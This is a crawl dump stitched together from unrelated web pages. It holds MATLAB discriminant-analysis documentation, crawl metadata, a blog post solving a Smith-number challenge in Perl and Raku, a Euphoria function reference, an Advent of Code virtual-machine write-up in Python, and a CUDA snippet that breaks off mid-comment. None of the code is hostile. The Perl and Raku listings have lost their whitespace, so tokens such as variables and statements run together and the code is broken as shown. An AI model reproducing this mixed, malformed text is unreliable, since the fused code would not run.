`Leaveout`.\n\nExample: `'Holdout',0.1`\n\nData Types: `double` | `single`\n\nNumber of folds to use in a cross-validated model, specified as the comma-separated pair consisting of `'KFold'` and a positive integer value greater than 1. If you specify `'KFold',k`, then the software completes these steps:\n\n1. Randomly partition the data into `k` sets.\n\n2. For each set, reserve the set as validation data, and train the model using the other `k` – 1 sets.\n\n3. Store the `k` compact, trained models in the cells of a `k`-by-1 cell vector in the `Trained` property of the cross-validated model.\n\nTo create a cross-validated model, you can use one of these four name-value pair arguments only: `CVPartition`, `Holdout`, `KFold`, or `Leaveout`.\n\nExample: `'KFold',5`\n\nData Types: `single` | `double`\n\nLeave-one-out cross-validation flag, specified as the comma-separated pair consisting of `'Leaveout'` and `'on'` or `'off'`. If you specify `'Leaveout','on'`, then, for each of the n observations (where n is the number of observations excluding missing observations, specified in the `NumObservations` property of the model), the software completes these steps:\n\n1. Reserve the observation as validation data, and train the model using the other n – 1 observations.\n\n2. Store the n compact, trained models in the cells of an n-by-1 cell vector in the `Trained` property of the cross-validated model.\n\nTo create a cross-validated model, you can use one of these four name-value pair arguments only: `CVPartition`, `Holdout`, `KFold`, or `Leaveout`.\n\nExample: `'Leaveout','on'`\n\n#### Hyperparameter Optimization Options\n\ncollapse all\n\nParameters to optimize, specified as the comma-separated pair consisting of `'OptimizeHyperparameters'` and one of the following:\n\n• `'none'` — Do not optimize.\n\n• `'auto'` — Use `{'Delta','Gamma'}`.\n\n• `'all'` — Optimize all eligible parameters.\n\n• String array or cell array of eligible parameter names.\n\n• Vector of `optimizableVariable` objects, typically the output of `hyperparameters`.\n\nThe optimization attempts to minimize the cross-validation loss (error) for `fitcdiscr` by varying the parameters. For information about cross-validation loss (albeit in a different context), see Classification Loss. To control the cross-validation type and other aspects of the optimization, use the `HyperparameterOptimizationOptions` name-value pair.\n\n### Note\n\n`'OptimizeHyperparameters'` values override any values you set using other name-value pair arguments. For example, setting `'OptimizeHyperparameters'` to `'auto'` causes the `'auto'` values to apply.\n\nThe eligible parameters for `fitcdiscr` are:\n\n• `Delta``fitcdiscr` searches among positive values, by default log-scaled in the range `[1e-6,1e3]`.\n\n• `DiscrimType``fitcdiscr` searches among `'linear'`, `'quadratic'`, `'diagLinear'`, `'diagQuadratic'`, `'pseudoLinear'`, and `'pseudoQuadratic'`.\n\n• `Gamma``fitcdiscr` searches among real values in the range `[0,1]`.\n\nSet nondefault parameters by passing a vector of `optimizableVariable` objects that have nondefault values. For example,\n\n```load fisheriris params = hyperparameters('fitcdiscr',meas,species); params(1).Range = [1e-4,1e6];```\n\nPass `params` as the value of `OptimizeHyperparameters`.\n\nBy default, iterative display appears at the command line, and plots appear according to the number of hyperparameters in the optimization. For the optimization and plots, the objective function is log(1 + cross-validation loss) for regression and the misclassification rate for classification. To control the iterative display, set the `Verbose` field of the `'HyperparameterOptimizationOptions'` name-value pair argument. To control the plots, set the `ShowPlots` field of the `'HyperparameterOptimizationOptions'` name-value pair argument.\n\nFor an example, see Optimize Discriminant Analysis Model.\n\nExample: `'auto'`\n\nOptions for optimization, specified as the comma-separated pair consisting of `'HyperparameterOptimizationOptions'` and a structure. This argument modifies the effect of the `OptimizeHyperparameters` name-value pair argument. All fields in the structure are optional.\n\nField NameValuesDefault\n`Optimizer`\n• `'bayesopt'` — Use Bayesian optimization. Internally, this setting calls `bayesopt`.\n\n• `'gridsearch'` — Use grid search with `NumGridDivisions` values per dimension.\n\n• `'randomsearch'` — Search at random among `MaxObjectiveEvaluations` points.\n\n`'gridsearch'` searches in a random order, using uniform sampling without replacement from the grid. After optimization, you can get a table in grid order by using the command `sortrows(Mdl.HyperparameterOptimizationResults)`.\n\n`'bayesopt'`\n`AcquisitionFunctionName`\n\n• `'expected-improvement-per-second-plus'`\n\n• `'expected-improvement'`\n\n• `'expected-improvement-plus'`\n\n• `'expected-improvement-per-second'`\n\n• `'lower-confidence-bound'`\n\n• `'probability-of-improvement'`\n\nAcquisition functions whose names include `per-second` do not yield reproducible results because the optimization depends on the runtime of the objective function. Acquisition functions whose names include `plus` modify their behavior when they are overexploiting an area. For more details, see Acquisition Function Types.\n\n`'expected-improvement-per-second-plus'`\n`MaxObjectiveEvaluations`Maximum number of objective function evaluations.`30` for `'bayesopt'` or `'randomsearch'`, and the entire grid for `'gridsearch'`\n`MaxTime`\n\nTime limit, specified as a positive real. The time limit is in seconds, as measured by `tic` and `toc`. Run time can exceed `MaxTime` because `MaxTime` does not interrupt function evaluations.\n\n`Inf`\n`NumGridDivisions`For `'gridsearch'`, the number of values in each dimension. The value can be a vector of positive integers giving the number of values for each dimension, or a scalar that applies to all dimensions. This field is ignored for categorical variables.`10`\n`ShowPlots`Logical value indicating whether to show plots. If `true`, this field plots the best objective function value against the iteration number. If there are one or two optimization parameters, and if `Optimizer` is `'bayesopt'`, then `ShowPlots` also plots a model of the objective function against the parameters.`true`\n`SaveIntermediateResults`Logical value indicating whether to save results when `Optimizer` is `'bayesopt'`. If `true`, this field overwrites a workspace variable named `'BayesoptResults'` at each iteration. The variable is a `BayesianOptimization` object.`false`\n`Verbose`\n\nDisplay to the command line.\n\n• `0` — No iterative display\n\n• `1` — Iterative display\n\n• `2` — Iterative display with extra information\n\nFor details, see the `bayesopt` `Verbose` name-value pair argument.\n\n`1`\n`UseParallel`Logical value indicating whether to run Bayesian optimization in parallel, which requires Parallel Computing Toolbox™. Due to the nonreproducibility of parallel timing, parallel Bayesian optimization does not necessarily yield reproducible results. For details, see Parallel Bayesian Optimization.`false`\n`Repartition`\n\nLogical value indicating whether to repartition the cross-validation at every iteration. If `false`, the optimizer uses a single partition for the optimization.\n\n`true` usually gives the most robust results because this setting takes partitioning noise into account. However, for good results, `true` requires at least twice as many function evaluations.\n\n`false`\nUse no more than one of the following three field names.\n`CVPartition`A `cvpartition` object, as created by `cvpartition`.`'Kfold',5` if you do not specify any cross-validation field\n`Holdout`A scalar in the range `(0,1)` representing the holdout fraction.\n`Kfold`An integer greater than 1.\n\nExample: `'HyperparameterOptimizationOptions',struct('MaxObjectiveEvaluations',60)`\n\nData Types: `struct`\n\n## Output Arguments\n\ncollapse all\n\nTrained discriminant analysis classification model, returned as a `ClassificationDiscriminant` model object or a `ClassificationPartitionedModel` cross-validated model object.\n\nIf you set any of the name-value pair arguments `KFold`, `Holdout`, `CrossVal`, or `CVPartition`, then `Mdl` is a `ClassificationPartitionedModel` cross-validated model object. Otherwise, `Mdl` is a `ClassificationDiscriminant` model object.\n\nTo reference properties of `Mdl`, use dot notation. For example, to display the estimated component means at the Command Window, enter `Mdl.Mu`.\n\ncollapse all\n\n### Discriminant Classification\n\nThe model for discriminant analysis is:\n\n• Each class (`Y`) generates data (`X`) using a multivariate normal distribution. That is, the model assumes `X` has a Gaussian mixture distribution (`gmdistribution`).\n\n• For linear discriminant analysis, the model has the same covariance matrix for each class, only the means vary.\n\n• For quadratic discriminant analysis, both means and covariances of each class vary.\n\n`predict` classifies so as to minimize the expected classification cost:\n\n`$\\stackrel{^}{y}=\\underset{y=1,...,K}{\\mathrm{arg}\\mathrm{min}}\\sum _{k=1}^{K}\\stackrel{^}{P}\\left(k|x\\right)C\\left(y|k\\right),$`\n\nwhere\n\n• $\\stackrel{^}{y}$ is the predicted classification.\n\n• K is the number of classes.\n\n• $\\stackrel{^}{P}\\left(k|x\\right)$ is the posterior probability of class k for observation x.\n\n• $C\\left(y|k\\right)$ is the cost of classifying an observation as y when its true class is k.\n\nFor details, see Prediction Using Discriminant Analysis Models.\n\n## Tips\n\nAfter training a model, you can generate C/C++ code that predicts labels for new data. Generating C/C++ code requires MATLAB Coder™. For details, see Introduction to Code Generation.\n\n## Alternative Functionality\n\n### Functions\n\nThe `classify` function also performs discriminant analysis. `classify` is usually more awkward to use.\n\n• `classify` requires you to fit the classifier every time you make a new prediction.\n\n• `classify` does not perform cross-validation or hyperparameter optimization.\n\n• `classify` requires you to fit the classifier when changing prior probabilities." ]
[ null, "https://jp.mathworks.com/help/examples/stats/win64/OptimizeADiscriminantAnalysisModelExample_01.png", null, "https://jp.mathworks.com/help/examples/stats/win64/OptimizeADiscriminantAnalysisModelExample_02.png", null, "https://jp.mathworks.com/help/examples/stats/win64/OptimizeDiscriminantAnalysisModelOnTallArrayExample_01.png", null, "https://jp.mathworks.com/help/examples/stats/win64/OptimizeDiscriminantAnalysisModelOnTallArrayExample_02.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6254917,"math_prob":0.8672246,"size":50513,"snap":"2019-51-2020-05","text_gpt3_token_len":13600,"char_repetition_ratio":0.21002197,"word_repetition_ratio":0.29140946,"special_character_ratio":0.2973294,"punctuation_ratio":0.15800531,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9722024,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-23T23:48:54Z\",\"WARC-Record-ID\":\"<urn:uuid:72b33df7-283f-4bc9-8aec-113b54c53040>\",\"Content-Length\":\"218433\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e9917f43-d641-4e51-9c6a-93f49a676cc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:f9d6c4a2-e347-4a03-a07f-a7110cc77c93>\",\"WARC-IP-Address\":\"23.50.228.199\",\"WARC-Target-URI\":\"https://jp.mathworks.com/help/stats/fitcdiscr.html?lang=en\",\"WARC-Payload-Digest\":\"sha1:OZVOXVECH27N2HBNYHE7L5P7LRNW4LAB\",\"WARC-Block-Digest\":\"sha1:CE4BO7HOJ42SJE7MFDJXGMOTFBMAMD5W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250614086.44_warc_CC-MAIN-20200123221108-20200124010108-00475.warc.gz\"}"}
https://github.polettix.it/ETOOBUSY/2021/10/07/pwc133-smith-numbers/
[ "TL;DR\n\nOn with TASK #2 from The Weekly Challenge #133. Enjoy!\n\n# The challenge\n\nWrite a script to generate first 10 Smith Numbers in base 10.\n\nAccording to Wikipedia:\n\nIn number theory, a Smith number is a composite number for which, in a given number base, the sum of its digits is equal to the sum of the digits in its prime factorization in the given number base.\n\n# The questions\n\nNothing much to ask in this case.\n\nWell, at least because there’s a clear expectation on the outputs, and the Wikipedia page provides the answer and much more.\n\nWhy should I want to know the answer beforehand? Because I didn’t know beforehand how hard it would be to find the first 10 items, so I didn’t know whether I had to think with some optimization in mind or not. It turns out that the first items are quite small and no optimization is needed, whew!\n\n# The solution\n\nThis time I’m starting with Perl first. The test for smith-iness is in its own sub is_smith, while smith_first takes care to find the first items as requested.\n\n#!/usr/bin/env perl\nuse v5.24;\nuse warnings;\nuse experimental 'signatures';\nno warnings 'experimental::signatures';\nuse List::Util 'sum';\nsub is_smith ($x) { my$sum = sum split m{}mxs, $x; my$div = 2;\nmy $ndiv = 0; while ($x > 1 && $sum > -1) { if ($x % $div == 0) { my$subsum = sum split m{}mxs, $div; while ($x % $div == 0) {$sum -= $subsum;$x /= $div; ++$ndiv;\n}\n}\n$div =$div % 2 ? $div + 2 : 3; } return$sum == 0 && $ndiv > 1; } sub smith_first ($n) {\nmy @retval;\nmy $candidate = 3; # one less of first composite number while ($n > @retval) {\nnext unless is_smith(++$candidate); push @retval,$candidate;\n}\nreturn @retval;\n}\nsay for smith_first(shift // 10);\n\n\nThe is_smith function tries 2 and then all odd numbers as candidate divisors. To do the check, we first calculate the sum of all digits in $sum; later, we will subtract the sum of the digits for all prime factors as many times as they appear. If we’re left with 0 and we removed at least two divisors… we have a Smith number. Thanks to repeated divisions, the check for a divisor will actually only succeed with prime numbers. When one of them divides our input, we calculate the sum of the digits in the divisor inside $subsum, then iterate until we have removed all instances of that divisor.\n\nThe Raku counterpart takes the same shape:\n\n#!/usr/bin/env raku\nuse v6;\nsub is-smith (Int:D() $x is copy where * > 0) { my$sum = $x.comb(/\\d/).sum; my$div = 2;\nmy $ndiv = 0; while$x > 1 && $sum > -1 { if$x %% $div { my$subsum = $div.comb(/\\d/).sum; while$x %% $div {$sum -= $subsum;$x /= $div; ++$ndiv;\n}\n}\n$div +=$div == 2 ?? 1 !! 2;\n}\nreturn $sum == 0 &&$ndiv > 1;\n}\nsub smith-first (Int:D $n is copy where * > 0) { my$candidate = 3; # one less of first composite number\ngather while $n > 0 { next unless is-smith(++$candidate);\ntake $candidate; --$n;\n}\n}\nsub MAIN ($n = 10) { .put for smith-first($n) }\n\n\nNothing much to add with respect to the Perl counterpart, honestly. I like a lot the presence of the is-divisible-by operator %%, as well as using comb to do the splitting by the things I want and, of course, be able to use my loved gather/take pair.\n\nHave fun folks, and stay safe!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.77027637,"math_prob":0.9917539,"size":3234,"snap":"2022-40-2023-06","text_gpt3_token_len":942,"char_repetition_ratio":0.108049534,"word_repetition_ratio":0.115447156,"special_character_ratio":0.31292516,"punctuation_ratio":0.14605068,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.998556,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-04T21:16:02Z\",\"WARC-Record-ID\":\"<urn:uuid:00978f57-e26b-4a4c-a295-73980782c08f>\",\"Content-Length\":\"12997\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:23abc07b-7e01-448a-81b4-072b98cb60e3>\",\"WARC-Concurrent-To\":\"<urn:uuid:c3b39b02-424a-43dc-a103-ba7bced0d24c>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://github.polettix.it/ETOOBUSY/2021/10/07/pwc133-smith-numbers/\",\"WARC-Payload-Digest\":\"sha1:IPKU2IL7AVK6IFKI3O2VL3E3UTUDLVHK\",\"WARC-Block-Digest\":\"sha1:LTZOCLZLGPQUAQFXWGKDSCA3WRALJ7T7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500154.33_warc_CC-MAIN-20230204205328-20230204235328-00460.warc.gz\"}"}
https://openeuphoria.org/wiki/view/updating%20oE%20%20is_even_obj.wc
[ "### updating oE is_even_obj\n\n#### is_even_obj\n\n```include math.e\nnamespace math\npublic function is_even_obj(object test_object)\n```\n\ntests if the supplied Euphoria object is even or odd.\n\n##### Parameters:\n1. test_object : any Euphoria object. The item to test.\n##### Returns:\n\nAn object,\n\n• If test_object is an integer...\n• 1 if its even.\n• 0 if its odd.\n• Otherwise if test_object is an atom this always returns 0\n• otherwise if test_object is an sequence it tests each element recursively, returning a sequence of the same structure containing ones and zeros for each element. A 1 means that the element at this position was even otherwise it was odd.\n##### Example 1:\n```for i = 1 to 5 do\n? {i, is_even_obj(i)}\nend for\n-- output ...\n-- {1,0}\n-- {2,1}\n-- {3,0}\n-- {4,1}\n-- {5,0}\n```\n##### Example 2:\n```? is_even_obj(3.4) --> 0\n```\n##### Example 3:\n```? is_even_obj({{1,2,3}, {{4,5},6,{7,8}},9}) --> {{0,1,0},{{1,0},1,{0,1}},0}\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52588123,"math_prob":0.8645109,"size":891,"snap":"2020-24-2020-29","text_gpt3_token_len":272,"char_repetition_ratio":0.14994363,"word_repetition_ratio":0.0,"special_character_ratio":0.3580247,"punctuation_ratio":0.2413793,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96844476,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-07T19:26:41Z\",\"WARC-Record-ID\":\"<urn:uuid:82afc413-e3b1-478d-864f-a3e7fab819f1>\",\"Content-Length\":\"10053\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b60a86d2-8fa0-4cef-9d37-af6c4b96ef36>\",\"WARC-Concurrent-To\":\"<urn:uuid:e440e49c-79c5-4bc3-b882-7d8ec7ac8623>\",\"WARC-IP-Address\":\"23.138.32.173\",\"WARC-Target-URI\":\"https://openeuphoria.org/wiki/view/updating%20oE%20%20is_even_obj.wc\",\"WARC-Payload-Digest\":\"sha1:SUMLEKRU2QNZSIDXWTXTCRI4FYOMNVOR\",\"WARC-Block-Digest\":\"sha1:FKZHRLNFYR5RGIGQJLCGAQ7RWAALJLRZ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655894904.17_warc_CC-MAIN-20200707173839-20200707203839-00287.warc.gz\"}"}
https://blog.jverkamp.com/2017/12/18/aoc-2017-day-18-duetvm/
[ "# AoC 2017 Day 18: Duetvm\n\n### Source: Duet\n\nPart 1: Create a virtual machine with the following instruction set:\n\n• snd X plays a sound with a frequency equal to the value of X\n• set X Y sets register X to Y\n• add X Y set register X to X + Y\n• mul X Y sets register X to X * Y\n• mod X Y sets register X to X mod Y\n• rcv X recovers the frequency of the last sound played, if X is not zero\n• jgz X Y jumps with an offset of the value of Y, iff X is greater than zero\n\nIn most cases, X and Y can be either an integer value or a register.\n\nWhat is the value recovered by rcv the first time X is non-zero?\n\nAnother virtual machine! These are my favorite. 😄\n\nThis time, assuming that we’ll use it again1, I’m going to create an open class and use decorators to actually create the methods. It’s a bit weird to do it this way, but it’s nicely flexible:\n\nclass VM(object):\nvms = []\n\ndef __init__(self):\n'''Initialize a VM.'''\n\nself.tick = 0\nself.pc = 0\nself.registers = collections.defaultdict(lambda : 0)\nself.output = []\nself.messages = queue.Queue()\n\nself.id = len(VM.vms)\nself.registers['p'] = self.id\nVM.vms.append(self)\n\n@staticmethod\ndef register(f, name = None):\nsetattr(VM, name or f.__name__, f)\nreturn f\n\ndef value(self, key):\n'''If key is a number, return that number; if it's a register, return it's value.'''\n\nval = self.registers.get(key, key)\ntry:\nreturn int(val)\nexcept:\nreturn val\n\ndef __call__(self, code, daemon = False):\n'''Run the given code with the given VM.'''\n\nif daemon:\nt.daemon = True\nt.start()\nreturn t\n\ntry:\nself.state = 'running'\n\nwhile 0 <= self.pc < len(code):\nself.tick += 1\ncmd, *args = code[self.pc]\ngetattr(self, cmd)(*args)\nself.pc += 1\n\nexcept StopIteration:\npass\n\nself.state = 'exited'\n\nreturn self.output\n\nThere are a few bits that we don’t need just yet (not until part 2). The important bits are the register function and the __call__ function (specifically the getattr in the main loop).\n\nIn the register function, we have the ability to add attributes to the VM class that any objects created from it will have access to. So for example:\n\[email protected]\ndef set(vm, x, y):\nvm.registers[x] = vm.value(y)\n\[email protected]\nvm.registers[x] += vm.value(y)\n\[email protected]\ndef mul(vm, x, y):\nvm.registers[x] *= vm.value(y)\n\[email protected]\ndef mod(vm, x, y):\nvm.registers[x] %= vm.value(y)\n\nThat means that if we have a VM object, we could theoretically call any of those methods on it:\n\n>>> vm = VM()\n>>> vm.set('a', 2)\n>>> vm.set('b', 5)\n>>> vm.mul('a', 'b')\n>>> dict(vm.registers)\n{'p': 1, 'a': 10, 'b': 5}\n\nAlternatively, implementing the __call__ function in a class means that objects of that class can be called as if they were functions. In this case, I will run code provided to them this way:\n\n>>> vm = VM()\n>>> vm([\n... ('set', 'a', 2),\n... ('set', 'b', 5),\n... ('mul', 'a', 'b'),\n... ])\n[]\n>>> dict(vm.registers)\n{'p': 2, 'a': 10, 'b': 5}\n\nI don’t know about you, but I think that’s pretty cool. 😄\n\nThe remaining three functions (for part 1) are:\n\[email protected]\ndef snd(vm, x):\nvm.output.append((vm.tick, vm.value(x)))\n\[email protected]\ndef jgz(vm, x, y):\nif vm.value(x) > 0:\nvm.pc += vm.value(y) - 1\n\[email protected]\ndef rcv(vm, x):\nif vm.value(x) != 0 and vm.output:\nprint(f'Recovered {vm.output[-1]}')\nraise StopIteration\n\nI’m specifically using StopIteration since that’s the Pythonic way of breaking out of a generator2.\n\nThat’s all we need to run part 1:\n\ncode = [line.split() for line in lib.input()]\n\nvm = VM()\nvm(code)\n\nWe don’t have to output anything since the implementation of rcv above does it for us. Coolio.\n\nBut that’s not everything I want to do here. Supposedly, the snd instruction is playing a note. What does this actually sound like?\n\nWell, we can use midiutil to write MIDI files, lets see what it sounds like:\n\nclass VM(object):\n...\n\ndef write_midi(self, filename):\n'''Write all of the output of the program so far as a MIDI file.'''\n\nimport math\nimport midiutil\n\nif self.output:\noffset = self.output\nelse:\noffset = 0\n\nclock = lib.param('clock')\n\nmidi = midiutil.MIDIFile(1)\n0, # Track\n0, # Start time\n120, # Tempo (BPM)\n)\n\nfor tick, frequency in self.output:\n# https://en.wikipedia.org/wiki/MIDI_tuning_standard#Frequency_values\npitch = int(69 + 12 * math.log(frequency / 440))\n0, # Track\n0, # Channel\npitch, # Pitch of the note (midi data values)\n(tick - offset) / clock, # Tick to add the note\n1, # Duration (beats)\n100, # Volume (0-127)\n)\n\nwith open(filename, 'wb') as fout:\nmidi.writeFile(fout)\n\nThere are a few complications / tuning factors here. Specifically, we are arbitrarily choosing 120 BPM for the tempo along with parameterizing how fast the virtual CPU can run compared to that tempo. Also, the output values appear to be raw frequencies, so we need toconvert them to MIDI notes before playing them using this formula.\n\nWriting this out for part 1, we can generate the output as a MIDI file. Using one of various programs3, we can convert this to an MP3:\n\nIt’s … not quite as interesting as I expected, but kind of haunting. Mostly I think it’s just cool that it’s playing something that was completely generated by running a ~40 line assembly language problem. That’s just cool4.\n\nPart 2: Rewrite the following two instructions:\n\n• snd X plays a sound with a frequency equal to the value of X and send X to the other program’s message queue\n• rcv X read a value from this program’s message queue (send by the other program’s snd command)\n\nInitialize a special register p to 0 for the first VM and 1 for the second one.\n\nEventually, the two programs will deadlock (both will be waiting for the other to send a value). When that happens, how many times has the second program (p = 1) send a value before this happened?\n\nOkay. That’s interesting. The main two challenges here are implementing the message queues and detecting when a deadlock has occurred.\n\[email protected]\ndef snd(vm, x):\nif not hasattr(vm, 'send_count'): vm.send_count = 0\nvm.send_count += 1\n\nindex = VM.vms.index(vm)\nVM.vms[(index + 1) % len(VM.vms)].messages.put(vm.value(x))\n\nvm.output.append((vm.tick, vm.value(x)))\n\[email protected]\ndef rcv(vm, x):\nvm.state = 'waiting'\n\nvalue = vm.messages.get()\nif value == StopIteration:\nraise StopIteration\nelse:\nvm.registers[x] = value\n\nvm.state = 'running'\n\nEssentially, we’re going to use the messages objects we built into the simulations earlier in order to send messages along with a class variable vms on VM that will keep track of all VMs running. In this case, there are only two, but this code is currently flexible enough for arbitrarily many VMs running together. In that case, each would send all values to the VM that was initialized next after them with the last sending to the first.\n\nFor the second requirement (deadlocks), we’re going to keep track of the current VM state. While the VMs are running, vm.state will be running, but while we are waiting to receive a value from the message queue, they will go to waiting. If we detect that both end up in waiting at the same time (plus some time to avoid just waiting for the VMs to realize the other has sent a message), we have a deadlock.\n\nwhile True:\nif vm0.state == vm1.state == 'waiting':\ntime.sleep(1)\nif vm0.state == vm1.state == 'waiting':\nvm0.messages.put(StopIteration)\nvm1.messages.put(StopIteration)\nbreak\n\nFor this to work, both VMs have to be in the waiting state twice a second apart. This isn’t perfect, since they could both be waiting on Python’s GIL to be doing something else at both times, but in practice I didn’t have that problem. This worked. We’ll also specifically use StopIteration again, this time in the message queues to tell the VMs to stop executing.\n\nAfter that, we wait again for both to exit and print out how many times p = 1 sent a value:\n\nwhile True:\nif vm0.state == vm1.state == 'exited':\nbreak\n\nprint(vm1.send_count)\n\nAnd just like last time, we can generate MIDI files for each program (vm0, vm1) and then play them together as a single MP3:\n\nTurns out, it takes rather a while for those to settle down (around an hour at the given tempo). There are some interesting features too. Starting around five minutes in, you can see vm1 run down a scale and them vm2 follow it:\n\nThis happens more and more often as the song goes on with less noise before it and longer descents until finally the noise goes away completely and the two programs deadlock:\n\nThat’s kind of neat.\n\nThe problem is… it’s not correct.\n\nThe problem is that I’m using locking queues for my messages and not advancing the VMs clock while they are waiting. So if vm0 sends a value at tick=100 but vm1 already ran rcv back at tick=50, the timestamps between the two machines are off by rather a bit. Instead of using the same tick values, it will always take exactly 1 tick to rcv. How do we fix that?\n\nOne option would be to not use a blocking get but rather to rewrite rcv to rcv a value if there is one to receive and do nothing (but not wait) if there isn’t (not advancing the pc either, so it will rcv again the next tick). This will be a lot closer, but it’s still not correct, since the two machines clocks don’t have to run at the same speed. Instead, they will each run as quickly as they can, so that rcv may be waiting anywhere between 0 and 50 ticks in the example above.\n\nAnother option would be to tie the VMs together even more so that I specifically execute one instruction on each VM per tick. This is actually the one I went with. What we want to do is add a second mode to the __call__ function:\n\ndef __call__(self, code, daemon = False, generator = False):\n'''\nRun the given code with the given VM.\n\nIf daemon is True, spawn a background thread to run the program in.\nIf generator is True, return a generator that yields once per tick.\n'''\n\ntry:\nself.state = 'running'\n\nwhile 0 <= self.pc < len(code):\nself.tick += 1\ncmd, *args = code[self.pc]\ngetattr(self, cmd)(*args)\nself.pc += 1\n\nif generator:\nyield\n\nexcept StopIteration:\npass\n\nself.state = 'exited'\n\nreturn self.output\n\nAll that really changed here is that if we tell the __call__ function to return a generator, it will yield on each tick. This does force the client running the virtual machines to manually advance the generator, but they know what they’re getting into, so it works.\n\nNext, we need to tweak the rcv function to not block:\n\[email protected]\ndef rcv(vm, x):\nvm.state = 'waiting'\n\ntry:\nvalue = vm.messages.get(block = False)\nif value == StopIteration:\nraise StopIteration\nelse:\nvm.registers[x] = value\n\nvm.state = 'running'\n\nexcept queue.Empty:\n# Run the rcv command again next tick\nvm.pc -= 1\n\nBy specifying block = False, the get will raise a queue.Empty exception, which we can catch. If we do, that means we need to try to rcv again on the next tick, so undo advancing the pc.\n\nFinally, the main loop needs to run one tick on both VMs in step:\n\nwhile True:\nnext(generator0)\nnext(generator1)\n\nif vm0.state == 'waiting' and vm1.state == 'waiting':\nbreak\n\nOnce nice thing here is that the deadlock detection is much easier to implement.\n\nIf we run it through, we see that we get exactly the same answer as before. We can then generate the corresponding two MIDI files (vm0, vm1) and the new (much better sounding) MP3:\n\nIt really does sound like the two machines playing a duet with one another, bouncing back and forth in some parts and actually playing together in others. It’s just as long as before (which makes sense), but sounds much better.\n\nIt took quite a bit longer to write up the MIDI half of that and this post then it did to originally solve the problem. But I think it was worth it. 😄\n\n\\$ python3 run-all.py day-18\n\nday-18 python3 duetvm.py input.txt --part 1 0.10424304008483887 Recovered 3188\nday-18 python3 duetvm.py input.txt --part 2 1.1558499336242676 7112\n\n1. We will! On Day 23: DuetVMC. [return]\n2. Under the hood, that’s exactly how generators tell for loops they are done running. [return]\n3. I used GarageBand. [return]\n4. Yes, I know I’m a geek. [return]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8379778,"math_prob":0.91875005,"size":11885,"snap":"2019-51-2020-05","text_gpt3_token_len":3152,"char_repetition_ratio":0.10849255,"word_repetition_ratio":0.054305285,"special_character_ratio":0.2748843,"punctuation_ratio":0.16351716,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96720177,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-19T18:15:38Z\",\"WARC-Record-ID\":\"<urn:uuid:3d47af7d-e03c-4e36-806a-439e0d460485>\",\"Content-Length\":\"46167\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c1bda58-0543-4708-aee8-c3ced05f91d9>\",\"WARC-Concurrent-To\":\"<urn:uuid:e0a8d346-39e1-4240-abd6-7278f0af6aed>\",\"WARC-IP-Address\":\"185.199.110.153\",\"WARC-Target-URI\":\"https://blog.jverkamp.com/2017/12/18/aoc-2017-day-18-duetvm/\",\"WARC-Payload-Digest\":\"sha1:7XKPXN2W52RMUMD5TWD6KREY4Z5TFNST\",\"WARC-Block-Digest\":\"sha1:WZIL4PBNLUKAR6QS5TQ2VY36WJWU6CMG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250594705.17_warc_CC-MAIN-20200119180644-20200119204644-00125.warc.gz\"}"}
https://blog.imalan.cn/archives/446/
[ "### In theory\n\n// device code to compute c = a + b;\n// this method assumes we have enough threads to do the computation\n// enough means larger than the size of array a, b and c\n__global__\nvoid addArray(int n, float* a, float* b, float* c)\n{\n// assume we have 1k elements to compute, in this way\n// thread 0 is responsible for c = a + b\n// thread 1 is responsible for c = a + b\n// and so on\nauto index = blockIdx.x * blockDim.x + threadIdx.x;\nif (index < n)\nc[index] = a[index] + b[index];\n}\n\n#define ARRAYSIZE 1000000\n#define BLOCKSIZE 1024 // can be any size, better be multiple of 32\n\n__host__\nint main()\n{\n// ...\n// calculate the minmal number of blocks to cover all data\nauto numBlocks = (ARRAYSIZE + BLOCKSIZE - 1) / BLOCKSIZE;\naddArray <<<numBlocks, BLOCKSIZE >>> (ARRAYSIZE, A, B, C);\n// ...\n}\n\n// another version to compute c = a + b\n// this uses grid loop to reuse some threads(if needed)\n__global__\nvoid addArray_gird_loop(int n, float* a, float* b, float* c)\n{\n// total number of threads in one grid\n// which is accessible to one kernel\nauto stride = blockDim.x * gridDim.x;\nauto index = blockIdx.x * blockDim.x + threadIdx.x;\n\n// compute using the whole grid at once\n// the reuse the threads in the same grid\n// assume we have 1k elements to compute, and a stride of 100\n// thread 0 is responsible for c = a + b\n// c = a + b...\n// thread 1 is responsible for c = a + b\n// c = a + b...\n// and so 